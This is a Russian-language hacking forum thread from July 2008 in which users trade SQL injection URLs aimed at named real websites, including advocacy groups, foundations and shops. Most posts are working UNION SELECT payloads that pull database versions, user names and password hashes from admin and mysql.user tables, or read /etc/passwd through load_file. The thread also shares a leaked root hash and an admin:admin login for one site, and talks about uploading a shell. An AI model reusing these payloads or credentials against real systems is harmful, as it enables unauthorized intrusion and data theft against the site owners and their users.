 |
|
11.07.2008, 20:05
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Eicta.org - PR 6
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(concat_ws(0x3a3a,0x3a3a,v ersion(),0x3a3a))),2,3,4,5,6,7,8,9,10,11,12/*
|
|
|
11.07.2008, 21:39
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами:
9483229
Репутация:
1160
|
|
http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...
|
|
|
|
11.07.2008, 23:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Сообщение от DDoSька
http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...
\\
http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admin/*
|
|
|
|
12.07.2008, 11:09
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* чтото странное он пишет!
Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
|
|
|
|
12.07.2008, 11:19
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
http://hyundai-trex.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/*
Вот еще!!! Хз,но раскрутить не получилось!
|
|
|
|
12.07.2008, 11:43
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*
Database Version: 4.0.23-standard
Database name: laptops_main
User name: laptops_main@localhost
2 BanQui вот тебе твоя скуля....
таблицы подобрать не смог.. результат смотрим в хедере
во 2-й походу слепая скуля...не стал подзапросами мучать если сильно надо сам добьёшь
Последний раз редактировалось Gorev; 12.07.2008 в 11:47..
|
|
|
|
12.07.2008, 13:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Glaad.org - PR 7
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18, 19,20--
4 версия. но есть права )
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+mysql.user--
и так..
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20-_
не пробвал шелл заливать.. думаю фильтирует кавычки...
Onthecommons.org - PR 6
http://onthecommons.org/content.php?id=99999'+union+select+concat_ws(0x3a, username,password)+from+onthec5_main.users+limit+0 ,1/*
http://onthecommons.org/login.php
admin;admin
Clasp.org - PR 6
http://www.clasp.org/publications.php?id=999999+UNION+SELECT+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12,13,14,15/*
TurkishCulturalFoundation.org - PR 5
http://www.turkishculturalfoundation.org/pages.php?ID=999999'+union+select+unhex(hex(concat _ws(0x3a,version(),table_name)))+from+information_ schema.tables+limit+26,1/*
Agsafe.com.au - PR 4
http://www.agsafe.com.au/guardian/content.php?id=9999999+union+select+1,2,unhex(hex( version())),4,5,6,7,8,9,10,11,12,13,14/*
Последний раз редактировалось sabe; 13.07.2008 в 08:39..
|
|
|
|
12.07.2008, 23:09
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log
пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )
и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--
|
|
|
|
13.07.2008, 00:51
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Сообщение от Calcutta
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log
пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )
и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--
пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )
это версия 4 а не 5 information_ schema.tables есть только в 5 ветке )
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user--
root:5ce0cb356302dfa5
Последний раз редактировалось ~!DoK_tOR!~; 13.07.2008 в 00:56..
|
|
|
|
13.07.2008, 02:29
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 335
С нами:
9963746
Репутация:
392
|
|
http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
